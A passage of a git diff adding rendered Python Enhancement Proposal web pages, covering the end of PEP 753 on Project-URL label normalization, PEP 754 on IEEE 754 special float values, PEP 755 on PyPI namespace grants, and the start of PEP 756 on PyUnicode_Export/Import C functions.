    • The mechanism for presenting this warning or notification is not +specified, since it will vary by index. By way of example, an index may +choose to present a warning in the HTTP response to an upload request, or +send an email or other notification to the maintainer(s) of the project.
    • +
    +
  • +
  • If a distribution’s metadata contains both sets of fields, the index MAY +choose to reject the distribution outright. However, this is +NOT RECOMMENDED until a future unspecified major metadata version +formally removes support for Home-page and Download-URL.
  • +
  • Any changes to the interpretation of metadata of version 1.2 or later that +result in previously recognized URLs no longer being recognized +SHOULD NOT be retroactively applied to previously uploaded packages.
  • +
+

These stipulations do not change the optionality of URL processing by indices. +In other words, an index that does not process URLs within uploaded +distributions may continue to ignore all URL fields entirely.

+

Similarly, these stipulations do not imply that the index should +persist any normalizations that it performs to a distribution’s metadata. +In other words, this PEP stipulates label normalization for the purpose +of user presentation, not for the purpose of modifying an uploaded distribution +or its “sidecar” PEP 658 metadata file.

+
+
+
+

Conventions for Project-URL labels

+

The deprecations proposed above require a formalization of the currently +informal relationship between Home-page, Download-URL, and their +Project-URL equivalents.

+

This formalization has two parts:

+
    +
  1. A set of rules for normalizing Project-URL labels during index-side +processing;
  2. +
  3. A set of “well-known” normalized label values that indices may specialize +URL presentation for.
  4. +
+
+

Label normalization

+

The core metadata specification stipulates that Project-URL labels are +free text, limited to 32 characters.

+

This PEP proposes adding the concept of a “normalized” label to the core +metadata specification. Label normalization is defined via the following +Python function:

+
import string
+def normalize_label(label: str) -> str:
+    chars_to_remove = string.punctuation + string.whitespace
+    removal_map = str.maketrans("", "", chars_to_remove)
+    return label.translate(removal_map).lower()
+
+
+

In plain language: a label is normalized by deleting all ASCII punctuation and +whitespace, and then converting the result to lowercase.

+

The following table shows examples of labels before (raw) and after +normalization:

+ + + + + + + + + + + + + + + + + + + + + + + +
Raw | Normalized
Homepage | homepage
Home-page | homepage
Home page | homepage
Change_Log | changelog
What's New? | whatsnew
+

When processing distribution metadata, package indices SHOULD perform +label normalization to determine if a given label is +well known for subsequent special processing. +Labels that are not well-known MUST be processed in their un-normalized +form.

+

Normalization does not change pre-existing semantics around duplicated +Project-URL labels. In other words, normalization may result in duplicate +labels in the project’s metadata, but only in the same manner that was already permitted +(since the core metadata specification does +not stipulate that labels are unique).

+

Excerpted examples of normalized metadata fields are provided in +Appendix A.

+
+
+

Well-known labels

+

In addition to the normalization rules above, this PEP proposes a +fixed (but extensible) set of “well-known” Project-URL labels, +as well as aliases and human-readable equivalents.

+

The following table lists these labels, in normalized form:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Label (Human-readable equivalent) | Description | Aliases
homepage (Homepage) | The project’s home page | (none)
source (Source Code) | The project’s hosted source code or repository | repository, sourcecode, github
download (Download) | A download URL for the current distribution, equivalent to Download-URL | (none)
changelog (Changelog) | The project’s comprehensive changelog | changes, whatsnew, history
releasenotes (Release Notes) | The project’s curated release notes | (none)
documentation (Documentation) | The project’s online documentation | docs
issues (Issue Tracker) | The project’s bug tracker | bugs, issue, tracker, issuetracker, bugtracker
funding (Funding) | Funding Information | sponsor, donate, donation
+

Indices MAY choose to use the human-readable equivalents suggested above +in their UI elements, if appropriate. Alternatively, indices MAY choose +their own appropriate human-readable equivalents for UI elements.

+

Packagers and metadata producers MAY choose to use any label that normalizes +to these labels (or their aliases) to communicate specific URL intents to +package indices and downstreams.

+

Similarly, indices MAY choose to specialize their rendering or presentation +of URLs with these labels, e.g. by presenting an appropriate icon or tooltip +for each label.

+

Indices MAY also specialize the rendering or presentation of additional +labels or URLs, including (but not limited to), labels that start with a +well-known label, and URLs that refer to a known service provider domain (e.g. +for documentation hosting or issue tracking).

+

This PEP recognizes that the list of well-known labels is unlikely to remain +static, and that subsequent additions to it should not require the overhead +associated with a formal PEP process or new metadata version. As such, +this PEP proposes that the list above become a “living” list within +the PyPA specifications.

+
+
+
+

Backwards Compatibility

+
+

Limited Impact

+

This PEP is expected to have little to no impact on existing packaging tooling +or package indices:

+
    +
  • Packaging tooling: no changes to the correctness or well-formedness +of the core metadata. This PEP proposes deprecations as well as behavioral +refinements, but all currently (and historically) produced metadata will +continue to be valid per the rules of its respective version.
  • +
  • Package indices: indices will continue to expect well-formed core metadata, +with no behavioral changes. Indices MAY choose to emit warnings or +notifications on the presence of now-deprecated fields, +per above.
  • +
+
+
+
+

Future Considerations

+

This PEP does not stipulate or require any future metadata changes.

+

However, per Metadata producers and Conventions for Project-URL labels, +we identify the following potential future goals for a new major release of +the core metadata standards:

+
    +
  • Outright removal of support for Home-page and Download-URL in the +next major core metadata version. If removed, package indices and consumers +MUST reject metadata containing these fields when said metadata is of +the new major version.
  • +
  • Enforcement of label normalization. If enforced, package producers +MUST emit only normalized Project-URL labels when generating +distribution metadata, and package indices and consumers MUST reject +distributions containing non-normalized labels. Note: requiring +normalization merely restricts labels to lowercase text, and excludes +whitespace and punctuation. It does NOT restrict project URLs solely to +the use of “well-known” labels.
  • +
+

These potential changes would be backwards incompatible, hence their +inclusion only in this section. Acceptance of this PEP does NOT commit +any future metadata revision to actually making these changes.

+
+
+

Security Implications

+

This PEP does not identify any positive or negative security implications +associated with deprecating Home-page and Download-URL or with +label normalization.

+
+
+

How To Teach This

+

The changes in this PEP should be transparent to the majority of the packaging +ecosystem’s userbase; the primary beneficiaries of this PEP’s changes are +packaging tooling authors and index maintainers, who will be able to reduce the +number of unique URL fields produced and checked.

+

A small number of package maintainers may observe new warnings or notifications +from their index of choice, should the index choose to ignore Home-page +and Download-URL as suggested. Similarly, a small number of package +maintainers may observe that their index of choice no longer renders +their URLs, if only present in the deprecated fields. However, no package +maintainers should observe rejected package uploads or other breaking +changes to packaging workflows due to this PEP’s proposed changes.

+

Anybody who observes warnings or changes to the presentation of +URLs on indices can be taught about this PEP’s behavior via official +packaging resources, such as the +Python Packaging User Guide +and PyPI’s user documentation, the latter of which +already contains an informal description of PyPI’s URL handling behavior.

+

If this PEP is accepted, the authors of this PEP will coordinate to update +and cross-link the resources mentioned above.

+
+
+

Appendix A: Label normalization examples

+

This appendix provides an illustrative excerpt of a distribution’s +metadata, before and after index-side processing:

+

Before:

+
Project-URL: Home-page, https://example.com
+Project-URL: Homepage, https://another.example.com
+Project-URL: Source, https://github.com/example/example
+Project-URL: GitHub, https://github.com/example/example
+Project-URL: Another Service, https://custom.example.com
+
+
+

After:

+
Project-URL: homepage, https://example.com
+Project-URL: homepage, https://another.example.com
+Project-URL: source, https://github.com/example/example
+Project-URL: github, https://github.com/example/example
+Project-URL: Another Service, https://custom.example.com
+
+
+

In particular, observe:

+
    +
  • Normalized duplicates are preserved (both Home-page and Homepage +become homepage);
  • +
  • Source and GitHub are both normalized into their respective forms, +but github is not transformed into source.
  • +
  • Another Service is not normalized, since its normal form +(anotherservice) is not a well-known label.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0753.rst

+

Last modified: 2024-10-30 06:11:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0754/index.html b/pep-0754/index.html new file mode 100644 index 00000000000..5b924e98a36 --- /dev/null +++ b/pep-0754/index.html @@ -0,0 +1,314 @@ + + + + + + + + PEP 754 – IEEE 754 Floating Point Special Values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 754 – IEEE 754 Floating Point Special Values

+
+
Author:
+
Gregory R. Warnes <gregory_r_warnes at groton.pfizer.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
28-Mar-2003
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. After sitting open for four years, it has +failed to generate sufficient community interest.

+

Several ideas of this PEP were implemented for Python 2.6. float('inf') +and repr(float('inf')) are now guaranteed to work on every supported +platform with IEEE 754 semantics. However the eval(repr(float('inf'))) +roundtrip is still not supported unless you define inf and nan yourself:

+
>>> inf = float('inf')
+>>> inf, 1E400
+(inf, inf)
+>>> neginf = float('-inf')
+>>> neginf, -1E400
+(-inf, -inf)
+>>> nan = float('nan')
+>>> nan, inf * 0.
+(nan, nan)
+
+
+

The math and the sys module also have gained additional features, +sys.float_info, math.isinf, math.isnan, math.copysign.

+
+
+

Abstract

+

This PEP proposes an API and provides a reference module that generates and tests for IEEE 754 double-precision special values: positive infinity, negative infinity, and not-a-number (NaN).

+
+
+

Rationale

+

The IEEE 754 standard defines a set of binary representations and +algorithmic rules for floating point arithmetic. Included in the +standard is a set of constants for representing special values, +including positive infinity, negative infinity, and indeterminate or +non-numeric results (NaN). Most modern CPUs implement the +IEEE 754 standard, including the (Ultra)SPARC, PowerPC, and x86 +processor series.

+

Currently, the handling of IEEE 754 special values in Python depends +on the underlying C library. Unfortunately, there is little +consistency between C libraries in how or whether these values are +handled. For instance, on some systems “float(‘Inf’)” will properly +return the IEEE 754 constant for positive infinity. On many systems, +however, this expression will instead generate an error message.

+

The output string representation for an IEEE 754 special value also +varies by platform. For example, the expression “float(1e3000)”, +which is large enough to generate an overflow, should return a string +representation corresponding to IEEE 754 positive infinity. Python +2.1.3 on x86 Debian Linux returns “inf”. On Sparc Solaris 8 with +Python 2.2.1, this same expression returns “Infinity”, and on +MS-Windows 2000 with Active Python 2.2.1, it returns “1.#INF”.

+

Adding to the confusion, some platforms generate one string on +conversion from floating point and accept a different string for +conversion to floating point. On these systems

+
float(str(x))
+
+
+

will generate an error when “x” is an IEEE special value.

+

In the past, some have recommended that programmers use expressions +like:

+
PosInf = 1e300**2
+NaN = PosInf/PosInf
+
+
+

to obtain positive infinity and not-a-number constants. However, the +first expression generates an error on current Python interpreters. A +possible alternative is to use:

+
PosInf = 1e300000
+NaN = PosInf/PosInf
+
+
+

While this does not generate an error with current Python interpreters, it is still an ugly and potentially non-portable hack. In addition, defining NaN in this way does not solve the problem of detecting such values. First, the IEEE 754 standard provides for an entire set of constant values for Not-a-Number. Second, the standard requires that

+
NaN != X
+
+
+

for all possible values of X, including NaN. As a consequence

+
NaN == NaN
+
+
+

should always evaluate to false. However, this behavior also is not +consistently implemented. [e.g. Cygwin Python 2.2.2]

+

Due to the many platform and library inconsistencies in handling IEEE +special values, it is impossible to consistently set or detect IEEE +754 floating point values in normal Python code without resorting to +directly manipulating bit-patterns.

+

This PEP proposes a standard Python API and provides a reference +module implementation which allows for consistent handling of IEEE 754 +special values on all supported platforms.

+
+
+

API Definition

+
+

Constants

+
+
NaN
Non-signalling IEEE 754 “Not a Number” value
+
PosInf
IEEE 754 Positive Infinity value
+
NegInf
IEEE 754 Negative Infinity value
+
+
+
+

Functions

+
+
isNaN(value)
Determine if the argument is an IEEE 754 NaN (Not a Number) value.
+
isPosInf(value)
Determine if the argument is an IEEE 754 positive infinity value.
+
isNegInf(value)
Determine if the argument is an IEEE 754 negative infinity value.
+
isFinite(value)
Determine if the argument is a finite IEEE 754 value (i.e., is not NaN, positive infinity, or negative infinity)
+
isInf(value)
Determine if the argument is an infinite IEEE 754 value (positive +or negative infinity)
+
+
+
+

Example

+

(Run under Python 2.2.1 on Solaris 8.)

+
>>> import fpconst
+>>> val = 1e30000 # should cause overflow and result in “Inf”
+>>> val
+Infinity
+>>> fpconst.isInf(val)
+1
+>>> fpconst.PosInf
+Infinity
+>>> nval = val/val # should result in NaN
+>>> nval
+NaN
+>>> fpconst.isNaN(nval)
+1
+>>> fpconst.isNaN(val)
+0
+
+
+
+
+

Implementation

+

The reference implementation is provided in the module “fpconst” [1], +which is written in pure Python by taking advantage of the “struct” +standard module to directly set or test for the bit patterns that +define IEEE 754 special values. Care has been taken to generate +proper results on both big-endian and little-endian machines. The +current implementation is pure Python, but some efficiency could be +gained by translating the core routines into C.
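For illustration only (this sketch is not part of the PEP or of the fpconst module), the core bit tests could be translated to C along these lines, reinterpreting the 64-bit pattern of a double and inspecting the IEEE 754 sign, exponent and mantissa fields:

#include <stdint.h>
#include <string.h>

/* Hypothetical C translation of fpconst's struct-based bit tests. */
static uint64_t
double_bits(double x)
{
    uint64_t bits;
    memcpy(&bits, &x, sizeof bits);  /* well-defined, unlike pointer casts */
    return bits;
}

static int
is_nan(double x)
{
    uint64_t bits = double_bits(x);
    /* NaN: exponent all ones, mantissa non-zero (sign bit ignored) */
    return (bits & 0x7FF0000000000000ULL) == 0x7FF0000000000000ULL
        && (bits & 0x000FFFFFFFFFFFFFULL) != 0;
}

static int
is_pos_inf(double x)
{
    /* +Inf: sign 0, exponent all ones, mantissa zero */
    return double_bits(x) == 0x7FF0000000000000ULL;
}

static int
is_neg_inf(double x)
{
    /* -Inf: sign 1, exponent all ones, mantissa zero */
    return double_bits(x) == 0xFFF0000000000000ULL;
}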

+

Patch 1151323 “New fpconst module” [2] on SourceForge adds the +fpconst module to the Python standard library.

+
+
+
+

References

+

See http://babbage.cs.qc.edu/courses/cs341/IEEE-754references.html for +reference material on the IEEE 754 floating point standard.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0754.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0755/index.html b/pep-0755/index.html new file mode 100644 index 00000000000..7dca4cebe53 --- /dev/null +++ b/pep-0755/index.html @@ -0,0 +1,427 @@ + + + + + + + + PEP 755 – Implicit namespace policy for PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 755 – Implicit namespace policy for PyPI

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Dustin Ingram <di at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
05-Sep-2024
+
Post-History:
+
07-Sep-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP codifies an implementation of PEP 752 for PyPI [1].

+
+
+

Motivation

+

Many projects and communities would benefit from the ability to reserve +namespaces. Since PyPI exists to serve the Python community, it is critical +to gather feedback to ensure that everyone’s needs are met.

+

A dedicated PEP is required because the operational and policy nuances are up +to each package repository to decide.

+
+
+

Rationale

+

PyPI has been understaffed, receiving the first dedicated specialist in +July 2024. Due to lack of resources, user support has been lacking for +package name claims, +organization requests, +storage limit increases, +and even account recovery.

+

The default policy of giving paid organizations more +leniency when reserving namespaces provides the following benefits:

+
    +
  • PyPI would have a constant source of funding for support specialists, +infrastructure maintenance, bug fixes and new features.
  • +
  • Although each application would require independent review, less human +feedback would be required because the process to approve a paid organization +already bestows a certain amount of trust.
  • +
+
+
+

Terminology

+
+
Paid/Corporate Organization
Corporate organizations are organizations +that pay for special functionality on PyPI. This PEP refers to them as +paid in most circumstances for brevity and to ease understanding for +non-native speakers.
+
Root Grant
A grant as defined by PEP 752 terminology.
+
Child Grant
A grant created from a root grant with the associated namespace being a +child namespace as defined by PEP 752 terminology.
+
+
+
+

Implementation

+
+

Grant Applications

+
+

Submission

+

Only organization (non-user) accounts have access to the grant application +form.

+

Applications for paid organizations receive priority in the reviewing queue. +This is both to offer a meaningful benefit to paid organizations and to ensure +that funding is available for PyPI’s operational costs, including more +reviewers.

+
+
+

Approval Criteria

+
    +
  1. The namespace must not be something common like tool or apps.
  2. +
  3. The namespace should be greater than three characters.
  4. +
  5. The namespace should properly and clearly identify the reservation owner.
  6. +
  7. The organization should be actively using the namespace.
  8. +
  9. There should be evidence that not reserving the namespace may cause +ambiguity, confusion, or other harm to the community.
  10. +
+

Organizations that are not paid organizations will represent one of the +following:

+
    +
  • Large, popular open-source projects with many packages
  • +
  • Universities that actively publish packages
  • +
  • Government organizations that actively publish packages
  • +
  • NPOs/NGOs that actively publish packages like +Our World in Data
  • +
+

Generally speaking, reviewers should be more tolerant of paid organizations that apply for grants for namespaces that they are not yet using.

+

For example, while it’s reasonable to grant a namespace to a startup or an +existing company with a new product line, it’s not as reasonable to grant a +namespace to a community project that doesn’t have many users.

+
+
+

Rejections

+

Rejected applications will receive a clear rationale for the decision based on the approval criteria. Applications rejected due to the namespace being too common will be persisted internally for future reviewers to reference, and new applications attempting to reserve a namespace that was previously rejected for that reason will display a warning.

+
+
+

Acceptance

+

When an application is accepted for a namespace that is used by projects +outside of the organization, an email will be sent to the owners of the +projects notifying them of the new grant. The email will contain a link to the +namespace’s page.

+
+
+
+

Grant Types

+

There are two types of grants.

+
+

Root Grant

+

An organization gets a root grant for every approved application. This grant +may produce any number of child grants.

+
+
+

Child Grant

+

A child grant may be created by the owner of a root grant at +any time without approval. The namespace associated with such grants must be a +child namespace of the root grant’s namespace.

+

Child grants cannot have their own child grants.

+
+
+
+

Grant Ownership

+

The owner of a grant may allow any number of other organizations to use the +grant. The grants behave as if they were owned by the organization. The owner +may revoke this permission at any time.

+

The owner may transfer ownership to another organization at any time without +approval from PyPI admins. If the organization is a paid organization, the +target for transfer must also be a paid organization. Settings for permitted +organizations are transferred as well.

+
+
+

User Interface

+
+

Namespace Page

+

The namespace of every active grant will have its own page that has information +such as its open status, the current owners, the +time at which ownership was granted and the total number of projects that match +the namespace.

+
+
+

Project Page

+

Every project’s page +(example) that +matches an active namespace grant will indicate what the prefix is (NuGet +currently does not do this) and will stand out as a pill or label. This value +will match the prefix key in the +namespace detail API.

+

Clicking on the namespace will take the user to +its page.

+
+
+

Visual Indicators

+

For projects that match an active namespace grant, users will be able to +quickly ascertain which of the following scenarios apply:

+
    +
Projects that are tied to a grant owner will not have a visual indicator; users should rely solely on the always-present prefix.
  2. +
  3. Projects that are not tied to a grant owner and the +matching grant is open will have a unique +indicator that does not convey mistrust or danger. A good choice might be +the users icon from Font Awesome or +the groups icon from Google Fonts.
  4. +
  5. Projects that are not tied to a grant owner and the +matching grant is restricted will have a unique visual indicator. This +situation arises when the project existed before the grant was created. +The indicator will convey inauthenticity or lack of trust. A good choice +might be a warning sign (⚠).
  6. +
+
+
+
+

Open Namespaces

+

When a child grant is created, its +open status will be inherited from the +root grant. Owners of child grants may make them open at any +time. If a grant is open, it cannot be made restricted unless the owner of the +grant is the owner of every project that matches the namespace.

+
+
+

Grant Removal

+

If a grant is shared with other organizations, the owner organization must +initiate a transfer as a prerequisite for organization deletion.

+

If a grant is not shared, the owner may unclaim the namespace in either of the +following circumstances:

+
    +
  • The organization manually removes themselves as the owner.
  • +
  • The organization is deleted.
  • +
+

When a reserved namespace becomes unclaimed, the UI will +reflect this such that matching projects will no longer have any indicators on +their page nor will the namespace have a dedicated page.

+
+
+
+

How to Teach This

+

For organizations, we will document how to reserve namespaces, what the +benefits are and pricing.

+

We will document PEP 541 on the same pages so that organizations are aware +of the main mechanism to report improper uses of existing packages matching +their grants.

+
+
+

Rejected Ideas

+
+

Page for Viewing All Active Grants

+

There is no page to view all active namespace grants because this has the +potential to leak private information such as upcoming products.

+
+
+

Visual Indicator for Owned Projects

+

There is no indicator for projects that are tied to a +grant owner primarily to reduce clutter, especially since +this is the most common scenario.

+

If there were an indicator, it would not be a check mark or similar, as NuGet chose, because it may mistakenly convey that there are associated security guarantees inherent to the use of the package. Additionally, some social media platforms use a check mark for verified users, which may cause confusion.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0755.rst

+

Last modified: 2024-09-16 20:31:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0756/index.html b/pep-0756/index.html new file mode 100644 index 00000000000..5a30d09c76e --- /dev/null +++ b/pep-0756/index.html @@ -0,0 +1,564 @@ + + + + + + + + PEP 756 – Add PyUnicode_Export() and PyUnicode_Import() C functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 756 – Add PyUnicode_Export() and PyUnicode_Import() C functions

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
PEP-Delegate:
+
C API Working Group
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2024
+
Python-Version:
+
3.14
+
Post-History:
+
14-Sep-2024
+
Resolution:
+
29-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add functions to the limited C API version 3.14:

+
    +
  • PyUnicode_Export(): export a Python str object as a Py_buffer +view.
  • +
  • PyUnicode_Import(): import a Python str object.
  • +
+

On CPython, PyUnicode_Export() has an O(1) complexity: no memory +is copied and no conversion is done.

+
+
+

Rationale

+
+

PEP 393

+

PEP 393 “Flexible String Representation” changed string internals in +Python 3.3 to use three formats:

+
    +
  • PyUnicode_1BYTE_KIND: Unicode range [U+0000; U+00ff], +UCS-1, 1 byte/character.
  • +
  • PyUnicode_2BYTE_KIND: Unicode range [U+0000; U+ffff], +UCS-2, 2 bytes/character.
  • +
  • PyUnicode_4BYTE_KIND: Unicode range [U+0000; U+10ffff], +UCS-4, 4 bytes/character.
  • +
+

A Python str object must always use the most compact format. For +example, a string which only contains ASCII characters must use the +UCS-1 format.

+

The PyUnicode_KIND() function can be used to know the format used by +a string.

+

One of the following functions can be used to access data:

+
    +
  • PyUnicode_1BYTE_DATA() for PyUnicode_1BYTE_KIND.
  • +
  • PyUnicode_2BYTE_DATA() for PyUnicode_2BYTE_KIND.
  • +
  • PyUnicode_4BYTE_DATA() for PyUnicode_4BYTE_KIND.
  • +
+

To get the best performance, a C extension should have 3 code paths, one for each of these 3 native string formats.
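For instance (a hedged sketch, not taken from the PEP; count_char is a hypothetical helper), such format-specialized code might look like:

#include <Python.h>

/* Hypothetical helper: count occurrences of ch, with one code path
   per native string format (UCS-1, UCS-2, UCS-4). */
static Py_ssize_t
count_char(PyObject *str, Py_UCS4 ch)
{
    Py_ssize_t len = PyUnicode_GET_LENGTH(str);
    Py_ssize_t count = 0;
    switch (PyUnicode_KIND(str)) {
    case PyUnicode_1BYTE_KIND: {
        const Py_UCS1 *data = PyUnicode_1BYTE_DATA(str);
        for (Py_ssize_t i = 0; i < len; i++) count += (data[i] == ch);
        break;
    }
    case PyUnicode_2BYTE_KIND: {
        const Py_UCS2 *data = PyUnicode_2BYTE_DATA(str);
        for (Py_ssize_t i = 0; i < len; i++) count += (data[i] == ch);
        break;
    }
    case PyUnicode_4BYTE_KIND: {
        const Py_UCS4 *data = PyUnicode_4BYTE_DATA(str);
        for (Py_ssize_t i = 0; i < len; i++) count += (data[i] == ch);
        break;
    }
    }
    return count;
}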

+
+
+

Limited C API

+

PEP 393 functions such as PyUnicode_KIND() and +PyUnicode_1BYTE_DATA() are excluded from the limited C API. It’s not +possible to write code specialized for UCS formats. A C extension using +the limited C API can only use less efficient code paths and string +formats.

+

For example, the MarkupSafe project has a C extension +specialized for UCS formats for best performance, and so cannot use the +limited C API.

+
+
+
+

Specification

+
+

API

+

Add the following API to the limited C API version 3.14:

+
int32_t PyUnicode_Export(
+    PyObject *unicode,
+    int32_t requested_formats,
+    Py_buffer *view);
+PyObject* PyUnicode_Import(
+    const void *data,
+    Py_ssize_t nbytes,
+    int32_t format);
+
+#define PyUnicode_FORMAT_UCS1  0x01   // Py_UCS1*
+#define PyUnicode_FORMAT_UCS2  0x02   // Py_UCS2*
+#define PyUnicode_FORMAT_UCS4  0x04   // Py_UCS4*
+#define PyUnicode_FORMAT_UTF8  0x08   // char*
+#define PyUnicode_FORMAT_ASCII 0x10   // char* (ASCII string)
+
+
+

The int32_t type is used instead of int to have a well-defined type size that does not depend on the platform or the compiler. See Avoid C-specific Types for the longer rationale.

+
+
+

PyUnicode_Export()

+

API:

+
int32_t PyUnicode_Export(
+    PyObject *unicode,
+    int32_t requested_formats,
+    Py_buffer *view)
+
+
+

Export the contents of the unicode string in one of the requested_formats.

+
    +
  • On success, fill view, and return a format (greater than 0).
  • +
  • On error, set an exception, and return -1. +view is left unchanged.
  • +
+

After a successful call to PyUnicode_Export(), +the view buffer must be released by PyBuffer_Release(). +The contents of the buffer are valid until they are released.

+

The buffer is read-only and must not be modified.

+

The view->len member must be used to get the string length. The +buffer should end with a trailing NUL character, but it’s not +recommended to rely on that because of embedded NUL characters.

+

unicode and view must not be NULL.

+

Available formats:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Constant Identifier | Value | Description
PyUnicode_FORMAT_UCS1 | 0x01 | UCS-1 string (Py_UCS1*)
PyUnicode_FORMAT_UCS2 | 0x02 | UCS-2 string (Py_UCS2*)
PyUnicode_FORMAT_UCS4 | 0x04 | UCS-4 string (Py_UCS4*)
PyUnicode_FORMAT_UTF8 | 0x08 | UTF-8 string (char*)
PyUnicode_FORMAT_ASCII | 0x10 | ASCII string (Py_UCS1*)
+

UCS-2 and UCS-4 use the native byte order.

+

requested_formats can be a single format or a bitwise combination of the +formats in the table above. +On success, the returned format will be set to a single one of the requested +formats.

+

Note that future versions of Python may introduce additional formats.

+

No memory is copied and no conversion is done.
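As a hedged usage sketch (not part of the PEP’s specification; export_code_unit_count is a hypothetical helper), a caller could request several formats and dispatch on whichever one is returned:

#include <Python.h>
#include <stdint.h>

/* Sketch: export a string and compute its length in code units of
   whichever format PyUnicode_Export() selected.
   Returns -1 with an exception set on error. */
static Py_ssize_t
export_code_unit_count(PyObject *str)
{
    Py_buffer view;
    int32_t fmt = PyUnicode_Export(
        str,
        PyUnicode_FORMAT_UCS1 | PyUnicode_FORMAT_UCS2
        | PyUnicode_FORMAT_UCS4 | PyUnicode_FORMAT_UTF8,
        &view);
    if (fmt < 0) {
        return -1;  /* exception already set */
    }

    Py_ssize_t count;
    switch (fmt) {
    case PyUnicode_FORMAT_UCS2:
        count = view.len / 2;   /* Py_UCS2: 2 bytes per code unit */
        break;
    case PyUnicode_FORMAT_UCS4:
        count = view.len / 4;   /* Py_UCS4: 4 bytes per code unit */
        break;
    default:
        count = view.len;       /* UCS-1 and UTF-8: 1 byte per unit */
        break;
    }

    PyBuffer_Release(&view);    /* the buffer is only valid until here */
    return count;
}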

+
+
+

Export complexity

+

On CPython, an export has a complexity of O(1): no memory is copied +and no conversion is done.

+

To get the best performance on CPython and PyPy, it’s recommended to +support these 4 formats:

+
(PyUnicode_FORMAT_UCS1 \
+ | PyUnicode_FORMAT_UCS2 \
+ | PyUnicode_FORMAT_UCS4 \
+ | PyUnicode_FORMAT_UTF8)
+
+
+

PyPy uses UTF-8 natively and so the PyUnicode_FORMAT_UTF8 format is +recommended. It requires a memory copy, since PyPy str objects can +be moved in memory (PyPy uses a moving garbage collector).

+
+
+

Py_buffer format and item size

+

Py_buffer uses the following format and item size depending on the +export format:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Export format | Buffer format | Item size
PyUnicode_FORMAT_UCS1 | "B" | 1 byte
PyUnicode_FORMAT_UCS2 | "=H" | 2 bytes
PyUnicode_FORMAT_UCS4 | "=I" | 4 bytes
PyUnicode_FORMAT_UTF8 | "B" | 1 byte
PyUnicode_FORMAT_ASCII | "B" | 1 byte
+
+
+

PyUnicode_Import()

+

API:

+
PyObject* PyUnicode_Import(
+    const void *data,
+    Py_ssize_t nbytes,
+    int32_t format)
+
+
+

Create a Unicode string object from a buffer in a supported format.

+
    +
  • Return a reference to a new string object on success.
  • +
  • Set an exception and return NULL on error.
  • +
+

data must not be NULL. nbytes must be positive or zero.

+

See PyUnicode_Export() for the available formats.
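A hedged usage sketch (import_latin1 and import_ascii are hypothetical helpers, not part of the PEP):

#include <Python.h>

/* Build a str object from a Latin-1 (UCS-1) buffer. */
static PyObject *
import_latin1(const void *buf, Py_ssize_t nbytes)
{
    return PyUnicode_Import(buf, nbytes, PyUnicode_FORMAT_UCS1);
}

/* Build a str object from bytes that must be pure ASCII; per the
   "ASCII format" section below, non-ASCII input fails with an
   exception set. */
static PyObject *
import_ascii(const void *buf, Py_ssize_t nbytes)
{
    return PyUnicode_Import(buf, nbytes, PyUnicode_FORMAT_ASCII);
}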

+
+
+

UTF-8 format

+

CPython 3.14 doesn’t use the UTF-8 format internally and doesn’t support +exporting a string as UTF-8. The PyUnicode_AsUTF8AndSize() function +can be used instead.

+

The PyUnicode_FORMAT_UTF8 format is provided for compatibility with +alternate implementations which may use UTF-8 natively for strings.

+
+
+

ASCII format

+

When the PyUnicode_FORMAT_ASCII format is requested for export, the PyUnicode_FORMAT_UCS1 export format is used for ASCII strings.

+

The PyUnicode_FORMAT_ASCII format is mostly useful for +PyUnicode_Import() to validate that a string only contains ASCII +characters.

+
+
+

Surrogate characters and embedded NUL characters

+

Surrogate characters are allowed: they can be imported and exported.

+

Embedded NUL characters are allowed: they can be imported and exported.

+
+
+
+

Implementation

+

https://github.com/python/cpython/pull/123738

+
+
+

Backwards Compatibility

+

There is no impact on the backward compatibility, only new C API +functions are added.

+
+
+

Usage of PEP 393 C APIs

+

A code search of the top 7,500 PyPI projects (in March 2024) shows that many projects import and export UCS formats with the regular C API.

+
+

PyUnicode_FromKindAndData()

+

25 projects call PyUnicode_FromKindAndData():

+
    +
  • Cython (3.0.9)
  • +
  • Levenshtein (0.25.0)
  • +
  • PyICU (2.12)
  • +
  • PyICU-binary (2.7.4)
  • +
  • PyQt5 (5.15.10)
  • +
  • PyQt6 (6.6.1)
  • +
  • aiocsv (1.3.1)
  • +
  • asyncpg (0.29.0)
  • +
  • biopython (1.83)
  • +
  • catboost (1.2.3)
  • +
  • cffi (1.16.0)
  • +
  • mojimoji (0.0.13)
  • +
  • mwparserfromhell (0.6.6)
  • +
  • numba (0.59.0)
  • +
  • numpy (1.26.4)
  • +
  • orjson (3.9.15)
  • +
